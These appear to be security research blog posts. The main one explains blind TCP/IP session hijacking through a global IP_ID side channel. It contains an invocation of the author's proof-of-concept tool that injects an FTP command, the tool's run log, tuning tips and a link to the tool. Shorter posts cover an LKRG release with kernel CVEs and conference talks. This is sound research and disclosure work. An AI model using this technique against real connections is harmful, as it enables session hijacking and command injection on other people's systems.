The tool which I developed in 2008 was implementing a known attack described by ‘lkm’ (there is a typo and real nickname of the author is ‘klm’) in Phrack 64 magazine and can be read here:

http://phrack.org/issues/64/13.html

This is an amazing article (research) and I encourage everyone to carefully study all the details.

Back in 2007 (and 2008) this attack could be executed successfully on many modern OSes (modern at that time) including Windows 2K/XP or FreeBSD 4. I gave a live presentation of this attack against Windows XP at a local conference in Poland (SysDay 2009).

Before we move to the details of how to perform the described attack, it is useful to refresh how TCP handles the communication in more detail. Quoting the Phrack paper:

Each of the two hosts involved in the connection computes a 32bits SEQ number randomly at the establishment of the connection. This initial SEQ number is called the ISN. Then, each time an host sends some packet with N bytes of data, it adds N to the SEQ number.

The sender put his current SEQ in the SEQ field of each outgoing TCP packet. The ACK field is filled with the next expected SEQ number from the other host. Each host will maintain his own next sequence number (called SND.NEXT), and next expected SEQ number from the other host (called RCV.NEXT).
(…)
TCP implements a flow control mechanism by defining the concept of “window”. Each host has a TCP window size (which is dynamic, specific to each TCP connection, and announced in TCP packets), that we will call RCV.WND.
At any given time, a host will accept bytes with sequence number between RCV.NXT and (RCV.NXT+RCV.WND-1). This mechanism ensures that at any time, there can be no more than RCV.WND bytes “in transit” to the host.
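The window rule quoted above can be written down as a one-line check. This is a minimal sketch; `seq_in_window` is a hypothetical helper name, and the arithmetic is done modulo 2^32 because the sequence space wraps around.

```python
MOD = 1 << 32  # TCP sequence numbers are 32-bit and wrap around


def seq_in_window(seq: int, rcv_nxt: int, rcv_wnd: int) -> bool:
    """True if seq lies in [rcv_nxt, rcv_nxt + rcv_wnd - 1], modulo 2**32."""
    return (seq - rcv_nxt) % MOD < rcv_wnd


# A window that starts just below the wrap-around point still covers
# small sequence numbers on the other side of it.
wraps = seq_in_window(5, 0xFFFFFFF0, 0x100)
outside = seq_in_window(0x200, 0xFFFFFFF0, 0x100)
```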

In short, in order to execute TCP/IP hijacking attack, we must know:

  • Client IP
  • Server IP (usually known)
  • Client port
  • Server port (usually known)
  • Sequence number of the client
  • Sequence number of the server

OK, but what does it have to do with IP ID?

In 1998(!), Salvatore Sanfilippo (aka antirez) posted in the Bugtraq mailing list a description of a new port scanning technique which is known today as an “Idle scan”. Original post can be found here:

https://seclists.org/bugtraq/1998/Dec/79

and you can read more about the Idle scan here:

https://nmap.org/book/idlescan.html

In short, if IP_ID is implemented as a global counter (which is the case e.g., in Windows 7), it is simply incremented with each sent IP packet. By “probing” the IP_ID of the victim we know how many packets have been sent between each “probe”. Such “probing” can be performed by sending any packet to the victim which results in a reply to the attacker. ‘lkm’ suggests using an ICMP packet, but it can be any packet with IP header:

[===================================================================]
attacker                                  Host
                --[PING]->
        <-[PING REPLY, IP_ID=1000]--

          ... wait a little ... 

                --[PING]->
        <-[PING REPLY, IP_ID=1010]-- 

<attacker> Uh oh, the Host sent 9 IP packets between my pings.
[===================================================================]
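The arithmetic in the diagram can be sketched as a small helper. It assumes, as the text does, that the host increments IP_ID by one per sent packet; `packets_between_probes` is a hypothetical name. The subtraction is done modulo 2^16 because IP_ID is a 16-bit field, and the second ping reply itself is not counted.

```python
def packets_between_probes(id_before: int, id_after: int) -> int:
    """Packets the host sent between two probes, excluding the second reply."""
    return (id_after - id_before) % 65536 - 1


from_diagram = packets_between_probes(1000, 1010)
across_wrap = packets_between_probes(65530, 4)
```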

This essentially creates some form of “covert channel” which can be exploited by remote attacker to “discover” all the necessary information to execute TCP/IP Hijacking attack. How? Let’s quote the original phrack article:

Discovering client’s port

Assuming we already know the client/server IP, and the server port, there’s a well known method to test if a given port is the correct client port. In order to do this, we can send a TCP packet with the SYN flag set to server-IP:server-port, from client-IP:guessed-client-port (we need to be able to send spoofed IP packets for this technique to work).

When the attacker guesses the valid client port, the server replies to the real client (not the attacker) with an ACK. If the port is incorrect, the server replies to the real client with SYN+ACK. The real client didn’t start a new connection, so it replies to the server with RST.

So, all we have to do to test if a guessed client-port is the correct one is:

– Send a PING to the client, note the IP ID
– Send our spoofed SYN packet
– Resend a PING to the client, note the new IP ID
– Compare the two IP IDs to determine if the guessed port was correct.
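The final comparison step can be sketched as pure decision logic (no packets are sent here). It assumes an otherwise idle client whose IP_ID grows by one per packet, and that only a wrong guess makes the client emit an extra packet (the RST); `guessed_port_is_correct` is a hypothetical name.

```python
def guessed_port_is_correct(id_before: int, id_after: int) -> bool:
    """Interpret two IP ID probes taken around one spoofed SYN.

    The second ping reply always accounts for one increment. Any extra
    increment is read as the client's RST, i.e. the guess was wrong.
    """
    extra_packets = (id_after - id_before) % 65536 - 1
    return extra_packets == 0


quiet = guessed_port_is_correct(1000, 1001)   # only the ping reply was sent
noisy = guessed_port_is_correct(1000, 1002)   # ping reply plus one more packet
```

On a client that is not idle, unrelated traffic also bumps the counter, so a real tool would have to repeat the measurement before trusting a single result.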

Finding the server’s SND.NEXT

This is the essential part, and the best I can do is to quote (again) the Phrack article:

Whenever a host receive a TCP packet with the good source/destination ports, but an incorrect seq and/or ack, it sends back a simple ACK with the correct SEQ/ACK numbers. Before we investigate this matter, let’s define exactly what is a correct seq/ack combination, as defined by the RFC793 [2]:

A correct SEQ is a SEQ which is between the RCV.NEXT and (RCV.NEXT+RCV.WND-1) of the host receiving the packet. Typically, the RCV.WND is a fairly large number (several dozens of kilobytes at least).

A correct ACK is an ACK which corresponds to a sequence number of something the host receiving the ACK has already sent. That is, the ACK field of the packet received by an host must be lower or equal than the host’s own current SND.SEQ, otherwise the ACK is invalid (you can’t acknowledge data that were never sent!).

It is important to note that the sequence number space is “circular”. For example, the condition used by the receiving host to check the ACK validity is not simply the unsigned comparison “ACK <= receiver’s SND.NEXT”, but the signed comparison “(ACK – receiver’s SND.NEXT) <= 0”.

Now, let’s return to our original problem: we want to guess server’s SND.NEXT. We know that if we send a wrong SEQ or ACK to the client from the server, the client will send back an ACK, while if we guess right, the client will send nothing. As for the client-port detection, this may be tested with the IP ID.

If we look at the ACK checking formula, we note that if we pick randomly two ACK values, let’s call them ack1 and ack2, such as |ack1-ack2| = 2^31, then exactly one of them will be valid. For example, let ack1=0 and ack2=2^31. If the real ACK is between 1 and 2^31 then the ack2 will be an acceptable ack. If the real ACK is 0, or is between (2^32 – 1) and (2^31 + 1), then, the ack1 will be acceptable.

Taking this into consideration, we can more easily scan the sequence number space to find the server’s SND.NEXT. Each guess will involve the sending of two packets, each with its SEQ field set to the guessed server’s SND.NEXT. The first packet (resp. second packet) will have his ACK field set to ack1 (resp. ack2), so that we are sure that if the guessed’s SND.NEXT is correct, at least one of the two packet will be accepted.
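The signed comparison and the trick with two ACK values that are 2^31 apart can be checked with a few lines of Python. This is a sketch of the quoted rule only; `signed32`, `ack_acceptable` and `ack_pair` are hypothetical helper names.

```python
MOD = 1 << 32
HALF = 1 << 31


def signed32(x: int) -> int:
    """Interpret x modulo 2**32 as a signed 32-bit value."""
    x %= MOD
    return x - MOD if x >= HALF else x


def ack_acceptable(ack: int, snd_next: int) -> bool:
    """Quoted rule: (ACK - receiver's SND.NEXT) <= 0 as a signed comparison."""
    return signed32(ack - snd_next) <= 0


def ack_pair(ack1: int = 0):
    """Two ACK guesses that are exactly 2**31 apart."""
    return ack1 % MOD, (ack1 + HALF) % MOD


# Whatever the real SND.NEXT is, at least one of the two guesses passes.
samples = [0, 1, HALF - 1, HALF, HALF + 1, MOD - 1, 0x12345678, 0xDEADBEEF]
covered = all(
    any(ack_acceptable(a, snd) for a in ack_pair())
    for snd in samples
)
```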

The sequence number space is way bigger than the client-port space, but two facts make this scan easier:

First, when the client receive our packet, it replies immediately. There’s not a problem with latency between client and server like in the client-port scan. Thus, the time between the two IP ID probes can be very small, speeding up our scanning and reducing greatly the odds that the client will have IP traffic between our probes and mess with our detection.

Secondly, it’s not necessary to test all the possible sequence numbers, because of the receiver’s window. In fact, we need only to do approx. (2^32 / client’s RCV.WND) guesses at worst (this fact has already been mentioned in [6]). Of course, we don’t know the client’s RCV.WND.
We can take a wild guess of RCV.WND=64K, perform the scan (trying each SEQ multiple of 64K). Then, if we didn’t find anything, we can try all SEQs such as seq = 32K + i*64K for all i. Then, all SEQ such as seq=16k + i*32k, and so on… narrowing the window, while avoiding to re-test already tried SEQs. On a typical “modern” connection, this scan usually takes less than 15 minutes with our tool.
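The scan order described in the quote (multiples of 64K first, then the midpoints 32K + i*64K, then 16K + i*32K, and so on) can be sketched as a generator. `seq_candidates` and its parameters are hypothetical; `min_wnd` is an assumed stopping point, and `space` is a parameter only so that the idea can be tried on a tiny sequence space.

```python
def seq_candidates(wnd=1 << 16, min_wnd=1 << 10, space=1 << 32):
    """Yield SEQ guesses, halving the assumed window on each pass.

    Each pass only visits the midpoints between values tried so far,
    so no SEQ is ever tested twice.
    """
    # First pass: every multiple of the guessed window.
    yield from range(0, space, wnd)
    stride = wnd
    while stride // 2 >= min_wnd:
        offset = stride // 2
        yield from range(offset, space, stride)
        stride = offset


# Tiny demonstration on a 32-value "sequence space".
demo = list(seq_candidates(wnd=8, min_wnd=2, space=32))
```

With the defaults, the first pass alone consists of 2^32 / 64K = 65536 guesses.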

With the server’s SND.NEXT known, and a method to work around our ignorance of the ACK, we may hijack the connection in the way “server -> client”. This is not bad, but not terribly useful, we’d prefer to be able to send data from the client to the server, to make the client execute a command, etc… In order to do this, we need to find the client’s SND.NEXT.

And here is a small, weird difference in Windows 7. The described scenario works perfectly for Windows XP, but I’ve encountered a different behavior in Windows 7. Using two edge-case ACK values to satisfy the ACK formula doesn’t really change anything there: I get exactly the same results by always using just one of the edge values for ACK. Originally, I thought that my implementation of the attack was not working against Windows 7. However, after some tests and tuning it turned out that’s not the case. I’m not sure why, or what I’m missing, but in the end you can send half as many packets and speed up the overall attack.

Finding the client’s SND.NEXT

Quote:

What we can do to find the client’s SND.NEXT ? Obviously we can’t use the same method as for the server’s SND.NEXT, because the server’s OS is probably not vulnerable to this attack, and besides, the heavy network traffic on the server would render the IP ID analysis infeasible.

However, we know the server’s SND.NEXT. We also know that the client’s SND.NEXT is used for checking the ACK fields of client’s incoming packets.
So we can send packets from the server to the client with SEQ field set to server’s SND.NEXT, pick an ACK, and determine (again with IP ID) if our ACK was acceptable.

If we detect that our ACK was acceptable, that means that (guessed_ACK – SND.NEXT) <= 0. Otherwise, it means.. well, you guessed it, that (guessed_ACK – SND_NEXT) > 0.

Using this knowledge, we can find the exact SND_NEXT in at most 32 tries by doing a binary search (a slightly modified one, because the sequence space is circular).
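The “slightly modified” binary search from the quote can be sketched against a simulated oracle. Everything here is an assumption made for illustration: `find_snd_next` and `make_oracle` are hypothetical names, and the oracle simply answers whether (guessed_ACK – SND.NEXT) <= 0 holds as a signed 32-bit comparison, which in the real attack would be inferred from the IP ID side channel.

```python
MOD = 1 << 32
HALF = 1 << 31


def make_oracle(snd_next):
    """Simulated victim: True if the ACK would be accepted."""
    def oracle(ack):
        diff = (ack - snd_next) % MOD
        return diff == 0 or diff >= HALF  # signed32(diff) <= 0
    return oracle


def find_snd_next(ack_is_acceptable):
    # Pick a base that is accepted, so SND.NEXT = base + j, 0 <= j <= 2**31.
    base = 0 if ack_is_acceptable(0) else HALF
    # Largest offset in [0, 2**31 - 1] that is still accepted.
    lo, hi = 0, HALF - 1
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if ack_is_acceptable((base + mid) % MOD):
            lo = mid
        else:
            hi = mid - 1
    # Edge case of the circular space: the offset may be exactly 2**31.
    if lo == HALF - 1 and ack_is_acceptable((base + HALF) % MOD):
        lo = HALF
    return (base + lo) % MOD


samples = [0, 1, HALF - 1, HALF, HALF + 1, MOD - 1, 0x12345678, 0xDEADBEEF]
recovered = [find_snd_next(make_oracle(s)) for s in samples]
```

This version needs one query to choose the base, 31 for the search and occasionally one more for the edge case, which is in line with the “at most 32 tries” order of magnitude mentioned in the quote.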

Now, at last we have all the required informations and we can perform the session hijacking from either client or server.

(Un)fortunately, Windows 7 is different here as well. This is connected to the difference, seen in the previous stage, in how it checks the correctness of ACK. Regardless of the guessed_ACK value ((guessed_ACK - SND.NEXT) <= 0 or (guessed_ACK - SND_NEXT) > 0), Windows 7 won’t send any packet back to the server. Essentially, we are blind here and we can’t use the same amazingly effective ‘binary search’ to find the correct ACK. However, we are not completely lost. We can always brute-force ACK if we have the correct SQN. Again, we don’t need to try every possible value of ACK; we can still use the same trick with the TCP window size. Nevertheless, to be more effective and not miss the correct ACK brackets, I’ve chosen to use a window size value of 0x3FF. Essentially, we are flooding the server with spoofed packets containing our payload for injection, with the correct SQN and a guessed ACK. This operation takes around 5 minutes and is effective 🙂 Nevertheless, if for any reason our payload is not injected, a smaller TCP window size (e.g., 0xFF) should be chosen.
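To get a feeling for the size of that brute force, here is a back-of-the-envelope sketch. It assumes that the “window size value” is used as the step between consecutive guessed ACK values, which is an interpretation of the description above rather than something taken from the tool; `ack_candidates` is a hypothetical name.

```python
def ack_candidates(step=0x3FF, space=1 << 32):
    """Guessed ACK values covering the whole 32-bit space with a given step."""
    return range(0, space, step)


guesses_3ff = len(ack_candidates(0x3FF))  # roughly 4.2 million guesses
guesses_ff = len(ack_candidates(0xFF))    # roughly 16.8 million guesses
```

Under that assumption, dropping the step from 0x3FF to 0xFF roughly quadruples the number of spoofed packets, which is the price of a finer-grained search.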

Important notes

  1. This type of attack is not limited to any specific OS, but rather leverages “covert channel” generated by implementing IP_ID as a global counter. In short, any OS which is vulnerable to the “Idle scan” is also vulnerable to the old-school blind TCP/IP Hijacking attack.
  2. We need to be able to send spoofed IP packets to execute this attack.
  3. Our attack relies on “scanning” and constant “poking” of IP_ID:
    • Any latency between the victim and the server affects such logic.
    • If the victim’s machine is overloaded (heavy or slow traffic) it obviously affects the attack. Taking appropriate measures of the victim’s networking performance might be necessary for correct tuning of the attack.

Proof-of-Concept

Originally, I implemented lkm’s attack in 2008 and tested it against Windows XP. When I ran the compiled binary on a modern system, everything worked fine. However, when I took the original sources and recompiled them in a modern Linux environment, my tool stopped working(!). The new binary was able to find neither the client’s port nor the SQN. However, the old binary still worked perfectly fine. What was really happening was a riddle to me. The output of the strace tool gave me some clues:

Generated packet from the old binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\[email protected]\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\353\234\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=24, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=24, msg_flags=0}, 0) = 40

Generated packet from the new binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\[email protected]\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\2563\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=28, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=32, msg_flags=0}, 0) = 40

cmsg_len and msg_controllen have different values. However, I didn’t modify the source code, so how is that possible? Some GCC/Glibc changes broke the functionality of sending the spoofed packet. I’ve found the answer here:

https://sourceware.org/pipermail/libc-alpha/2016-May/071274.html
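
For reference, both fields in the traces above are derived from the size of the ancillary payload, which for IP_PKTINFO is a 12-byte struct in_pktinfo. A small sketch using the CMSG_LEN and CMSG_SPACE helpers from Python’s socket module (available on Unix) shows how the two sizes relate on the machine it runs on. The constant and function names are illustrative:

```python
import socket
import struct

# struct in_pktinfo { int ipi_ifindex; struct in_addr ipi_spec_dst;
#                     struct in_addr ipi_addr; }
IN_PKTINFO_SIZE = struct.calcsize("i4s4s")


def pktinfo_control_sizes():
    """Return (cmsg_len, msg_controllen) for one IP_PKTINFO control message."""
    cmsg_len = socket.CMSG_LEN(IN_PKTINFO_SIZE)      # header + payload, no trailing padding
    controllen = socket.CMSG_SPACE(IN_PKTINFO_SIZE)  # header + payload + alignment padding
    return cmsg_len, controllen


cmsg_len, controllen = pktinfo_control_sizes()
print("cmsg_len =", cmsg_len, "msg_controllen =", controllen)
```

The results depend on the platform’s cmsghdr layout and alignment. On 64-bit Linux I would expect 28 and 32, which are the values in the new binary’s trace.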

I needed to rewrite the spoofing function to make it work again in a modern Linux environment. However, to do that I needed to use a different API. I wonder how many non-offensive tools were broken by this change 🙂

Windows 7

I’ve tested this tool against a fully updated Windows 7. Surprisingly, rewriting the PoC was not the most difficult task… setting up a fully updated Windows 7 is much more problematic. Many updates break the update channel/service(!) itself and you need to fix it manually. Usually, this means manually downloading a specific KB and installing it in “safe mode”. That can “unlock” the update service so you can continue your work. In the end it took me around 2-3 days to get a fully updated Windows 7 and it looks like this:

192.168.1.132 – attacker’s IP address
192.168.1.238 – victim’s Windows 7 machine IP address
192.168.1.169 – FTP server running on Linux. I’ve tested ProFTPd and vsFTP servers running under git TOT kernel (5.11+)

This tool does not do appropriate per-victim “tuning”, which could significantly speed up the attack. However, in my specific case, the full attack (finding the client’s port, the server’s SQN and the client’s SQN) took about 45 minutes.

I found old logs from attacking Windows XP (~2009) and the entire attack took almost an hour:

pi3-darkstar z_new # time ./test -r 192.168.254.20 -s 192.168.254.46 -l 192.168.254.31 -p 21 -P 5357 -c 49450 -C "PWD"

                …::: -=[ [d]evil_pi3 TCP/IP Blind Spoofer by Adam ‘pi3’ Zabrocki ]=- :::…

        [+] Trying to find client port
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [+] Second level of verifcation
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [!!] Port is found (49456)! Let’s go further…

        [+] Trying to find server’s window SQN
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535
        [+] Rechecking…
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535

        [!!] SQN => 1874825280, with seq_offset => 65535

        [+] Trying to find server’s real SQN
        [+] Found server’s real SQN => 1874825279 => seq_offset 32767
        [+] Found server’s real SQN => 1874825277 => seq_offset 16383
        [+] Found server’s real SQN => 1874825275 => seq_offset 8191
        [+] Found server’s real SQN => 1874825273 => seq_offset 4095
        [+] Found server’s real SQN => 1874823224 => seq_offset 2047
        [+] Found server’s real SQN => 1874822199 => seq_offset 1023
        [+] Found server’s real SQN => 1874821686 => seq_offset 511
        [+] Found server’s real SQN => 1874821684 => seq_offset 255
        [+] Found server’s real SQN => 1874821555 => seq_offset 127
        [+] Found server’s real SQN => 1874821553 => seq_offset 63
        [+] Found server’s real SQN => 1874821520 => seq_offset 31
        [+] Found server’s real SQN => 1874821518 => seq_offset 15
        [+] Found server’s real SQN => 1874821509 => seq_offset 7
        [+] Found server’s real SQN => 1874821507 => seq_offset 3
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Rechecking…
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1

        [!!] Real server’s SQN => 1874821505

        [+] Finish! check whether command was injected (should be :))

        [!] Next SQN [1874822706]

real    56m38.321s
user    0m8.955s
sys     0m29.181s
pi3-darkstar z_new #
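
The log above first finds a sequence number inside the server’s window and then keeps halving seq_offset until it reaches the exact value. The sketch below shows that general idea as a coarse scan followed by bisection. It is not the tool’s actual code: `make_oracle` is a hypothetical stand-in that simulates the answer the real attack has to infer from IP_ID changes, and the window is simplified to one contiguous range.

```python
MOD = 2 ** 32  # TCP sequence numbers wrap at 32 bits


def make_oracle(rcv_nxt, window):
    """Simulated side channel (hypothetical): is seq inside the receive window?"""
    def in_window(seq):
        return (seq - rcv_nxt) % MOD < window
    return in_window


def coarse_scan(in_window, step, start=0):
    """Probe every `step` values; return the first accepted one, or None."""
    for i in range(MOD // step + 1):
        seq = (start + i * step) % MOD
        if in_window(seq):
            return seq
    return None


def refine(in_window, hit, step):
    """Bisect backwards from an accepted value to the left edge of the window."""
    lo, hi = 0, step  # invariant: hit - lo is accepted, hit - hi is rejected
    while in_window((hit - hi) % MOD):  # widen until we are left of the window
        lo, hi = hi, hi * 2
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if in_window((hit - mid) % MOD):
            lo = mid
        else:
            hi = mid
    return (hit - lo) % MOD


def find_rcv_nxt(in_window, step=65535):
    """Coarse scan, retrying with a smaller step if the scan jumps over the window."""
    while step > 0:
        hit = coarse_scan(in_window, step)
        if hit is not None:
            return refine(in_window, hit, step)
        step //= 2
    return None


oracle = make_oracle(rcv_nxt=1874821505, window=65535)
window_sqn = coarse_scan(oracle, 65535)  # 1874825280
real_sqn = find_rcv_nxt(oracle)          # 1874821505
```

With the values from the log, scanning from 0 in steps of 65535 first lands on 1874825280, and the bisection then narrows it down to 1874821505 in about 16 probes. In the real attack each probe is far more expensive than a function call, because it involves spoofed packets and IP_ID sampling.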

Some more notes:

  • Sometimes the tool keeps spinning around the same value when trying to find the “server’s real SQN”. If you see the number 1 in parentheses next to the value, kill the attack, copy the calculated SQN (the value the tool was spinning around) and pass it as the SQN start parameter (-M). That should fix this edge case.
  • Sometimes scanning with a 64KB window size can ‘overjump’ the appropriate SQN range, so you might want to reduce the window size. The tool should change the window size automatically if it finishes scanning the full SQN range with the current window size without finding the correct value, but that takes time. You might want to start scanning with a smaller window size (although that implies a longer attack).
  • By default, the tool sends an ICMP message to the victim’s machine to read IP_ID. However, I’ve implemented functionality to read that field from any IP packet: the tool sends a standard SYN packet and waits for the reply to extract IP_ID. Pass an appropriate TCP port via the -P parameter.
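
Reading IP_ID from an arbitrary reply works because the Identification field sits at a fixed offset in every IPv4 header, whatever the payload is. A minimal sketch of that extraction (the function name and the sample header are illustrative, not taken from the tool):

```python
import struct


def ip_id_from_packet(packet: bytes) -> int:
    """Return the 16-bit Identification field of a raw IPv4 packet."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    # Bytes 4-5 of the IPv4 header hold the Identification field (network byte order).
    (ident,) = struct.unpack_from("!H", packet, 4)
    return ident


# Hand-built 20-byte header: version/IHL, TOS, total length, ID, flags/fragment,
# TTL, protocol (6 = TCP), checksum (left at 0), source and destination address.
sample = struct.pack(
    "!BBHHHBBH4s4s",
    0x45, 0, 40, 0x1234, 0x4000, 64, 6, 0,
    bytes([192, 168, 1, 238]), bytes([192, 168, 1, 132]),
)
sample_id = ip_id_from_packet(sample)  # 0x1234
```

The same function works on an ICMP echo reply or on the SYN/ACK or RST that answers a SYN probe, as long as the capture starts at the IP header.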

The tool can be found here:

http://site.pi3.com.pl/exp/devil_pi3.c

Closing words

Modern operating systems (like Windows 10) usually implement IP_ID as a “local” counter per session. If you monitor IP_ID in a specific session, you can see it is simply incremented for each packet sent. However, each session has an independent IP_ID base.
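
To illustrate why that change closes the side channel, here is a toy simulation of both policies. The classes are simplified assumptions (counters start at 0, one counter per peer name), not a model of any real network stack:

```python
class GlobalCounter:
    """One IP_ID counter shared by all outgoing packets."""

    def __init__(self):
        self.value = 0

    def next_id(self, peer):
        self.value = (self.value + 1) % 65536
        return self.value


class PerPeerCounter:
    """An independent IP_ID counter for every peer/session."""

    def __init__(self):
        self.values = {}

    def next_id(self, peer):
        self.values[peer] = (self.values.get(peer, 0) + 1) % 65536
        return self.values[peer]


def observed_delta(stack, hidden_packets):
    """IP_ID difference the attacker sees across two probes while the
    victim sends hidden_packets packets to the server in between."""
    first = stack.next_id("attacker")
    for _ in range(hidden_packets):
        stack.next_id("server")
    second = stack.next_id("attacker")
    return (second - first) % 65536


global_delta = observed_delta(GlobalCounter(), 3)     # 4: hidden traffic is visible
per_peer_delta = observed_delta(PerPeerCounter(), 3)  # 1: hidden traffic is invisible
```

With a global counter the attacker’s delta grows with the traffic sent to the server. With per-session counters it stays at 1 regardless, so there is nothing left to measure.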

Happy hacking,
Adam

LKRG 0.9.0 has been released!

12 April 2021 at 21:54
By: pi3

During LKRG development and testing I’ve found 7 Linux kernel bugs, 4 of them have CVE numbers (however, 1 CVE number covers 2 bugs):

CVE-2021-3411  - Linux kernel: broken KRETPROBES and OPTIMIZER
CVE-2020-27825 - Linux kernel: Use-After-Free in the ftrace ring buffer
                 resizing logic due to a race condition
CVE-2020-25220 - Linux kernel Use-After-Free in backported patch for
                 CVE-2020-14356 (affected kernels: 4.9.x before 4.9.233,
                 4.14.x before 4.14.194, and 4.19.x before 4.19.140)
CVE-2020-14356 - Linux kernel Use-After-Free in cgroup BPF component
                 (affected kernels: since 4.5+ up to 5.7.10)

I’ve also found 2 other issues related to the ftrace UAF bug (CVE-2020-27825):

  • A deadlock issue which was not really addressed: the devs said they would take a look, but there have not been many updates on that.
  • A problem with the code related to the hwlatd kernel thread: it synchronizes incorrectly with its launcher / killer. You can get a WARN in kernels all the time.

CVE-2021-3411 refers to 2 different types of bugs:

  • Broken KRETPROBE (recently reported)
  • Incompatibility of KPROBE optimizer with the latest changes in the linker.

Additionally, I’ve also found a bug in the kernel signal handling of a dying process:

CVE-2020-12826 – Linux kernel prior to 5.6.5 does not sufficiently restrict exit signals

However, I don’t remember if I found it during my work related to LKRG, so I’m not counting it here (otherwise the total would be 8 bugs, 5 of them with CVEs).

Those are pretty bad stats… However, it might be an interesting story to tell during the LKRG announcement of the new version. It could also be an interesting talk for a conference.

Full announcement can be read here:
https://www.openwall.com/lists/announce/2021/04/12/1

Best regards,
Adam

My talks @ BlackHat 2021 and DefCon29

3 July 2021 at 20:59
By: pi3

This year I’m going to present some amazing research on:

Both of them are really unusual and interesting topics 😉

If anyone is going to be in Las Vegas during BlackHat and/or DefCon this year and would like to grab a beer, just let me know!

Thanks,
Adam
